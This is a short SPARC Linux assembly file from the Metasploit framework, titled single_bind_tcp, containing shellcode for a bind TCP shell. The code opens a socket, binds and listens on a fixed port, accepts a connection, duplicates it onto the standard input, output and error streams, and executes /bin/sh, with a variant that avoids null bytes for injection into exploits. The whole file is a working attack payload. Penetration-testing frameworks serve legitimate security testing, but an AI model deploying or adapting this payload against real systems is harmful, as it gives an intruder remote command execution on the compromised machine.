1
##
2
#
3
#        Name: single_bind_tcp
4
#   Platforms: Linux
5
#     Authors: vlad902 <vlad902 [at] gmail.com>
6
#     Version: $Revision: 1652 $
7
#     License:
8
#
9
#        This file is part of the Metasploit Exploit Framework
10
#        and is subject to the same licenses and copyrights as
11
#        the rest of this package.
12
#
13
# Description:
14
#
15
#        Single bind TCP shell.
16
#
17
##
18

19
.globl main
20

21
main:
22
	andn	%sp, 7, %sp
23

24
	mov	2, %l0
25
	mov	1, %o0
26
	st	%l0, [ %sp - 0x0c ]
27
	st	%o0, [ %sp - 0x08 ]
28
	st	%g0, [ %sp - 0x04 ]
29
	sub	%sp, 0x0c, %o1
30
	mov	0xce, %g1
31
	ta	0x10
32

33
	sub	%sp, 0x20, %l2
34
	mov	0x10, %l3
35
	st	%o0, [ %sp - 0x0c ]
36
	std	%l3, [ %sp - 0x08 ]
37

38
#ifndef NO_NULLS
39
	set	0x00027a68, %l4
40
#else
41
	set	0x27a68fff, %l4
42
	srl	%l4, 12, %l4
43
#endif
44
	xor	%l5, %l5, %l5
45
	std	%l4, [ %sp - 0x20 ]
46

47
	mov	2, %o0
48
	ta	0x10
49

50
	mov	1, %l1
51
	st	%l1, [ %sp - 0x08 ]
52
	mov	4, %o0
53
	ta	0x10
54

55
	st	%g0, [ %sp - 0x08 ]
56
	st	%g0, [ %sp - 0x04 ]
57
	mov	5, %o0
58
	ta	0x10
59

60
	st	%o0, [ %sp - 0x0c ]
61
	mov	3, %o1
62
dup2_loop:
63
	subcc	%o1, 1, %o1
64
	mov	0x5a, %g1 
65
	ta	0x10
66

67
	bnz	dup2_loop
68
	ld	[ %sp - 0x0c ], %o0
69

70
	xor	%o3, %o3, %o2
71
	set	0x2f62696e, %l0
72
	set	0x2f736800, %l1
73
	sub	%sp, 0x10, %o0
74
	sub	%sp, 0x08, %o1
75
	std	%l0, [ %sp - 0x10 ]
76
	st	%o0, [ %sp - 0x08 ]
77
	st	%g0, [ %sp - 0x04 ]
78
	mov	0x3b, %g1
79
	ta	0x08
80

81